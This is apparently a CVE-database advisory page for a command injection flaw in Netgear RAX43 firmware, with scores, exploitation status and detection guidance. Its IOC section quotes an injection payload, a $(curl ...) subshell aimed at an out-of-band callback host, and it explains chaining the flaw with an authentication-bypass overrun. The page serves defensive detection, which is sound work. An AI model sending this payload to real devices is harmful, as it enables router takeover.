cbcvebase.
CVE-2021-20167
published 2021-12-30

CVE-2021-20167: Netgear RAX43 version 1.0.3.96 contains a command injection vulnerability. The readycloud cgi application is vulnerable to command injection in the name…

PriorityP278high8CVSS 3.1
AVAACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
8.53%
94.4th percentile
Netgear RAX43 version 1.0.3.96 contains a command injection vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
netgearrax43_firmware

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/readycloud_control.cgi
command"name":"';$(curl {{interactsh-url}});'"
  • Detect exploitation attempts by monitoring POST requests to /cgi-bin/readycloud_control.cgi with an oversized query string (>200 chars of repeated characters) followed by /api/users, indicative of the buffer overrun authentication bypass chained with command injection.
  • Detect command injection payload in the 'name' parameter of the POST body: look for shell metacharacters such as single-quotes and $() subshell syntax (e.g., ';$(...)') targeting readycloud_control.cgi.
  • Alert on outbound curl/HTTP requests originating from the router process (readycloud_control.cgi) as a sign of successful command injection; interactsh-style OOB callback detection via User-Agent 'curl' is used in PoC validation.
  • This vulnerability chains CVE-2021-20166 (buffer overrun in URL parsing of cgi-bin endpoint for authentication bypass) with CVE-2021-20167 (command injection in 'name' parameter); detections should cover both the oversized URL path and the injected name field together.
  • ·The buffer overrun authentication bypass (CVE-2021-20166) is required to exploit the command injection (CVE-2021-20167) without prior authentication; the oversized query string in the URL is the bypass mechanism, not a standalone indicator.
  • ·Affected firmware is specifically Netgear RAX43 version 1.0.3.96; detections and mitigations should be scoped to this firmware version (CPE: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96).

CVSS provenance

nvdv3.18.0HIGHCVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.7HIGHAV:A/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.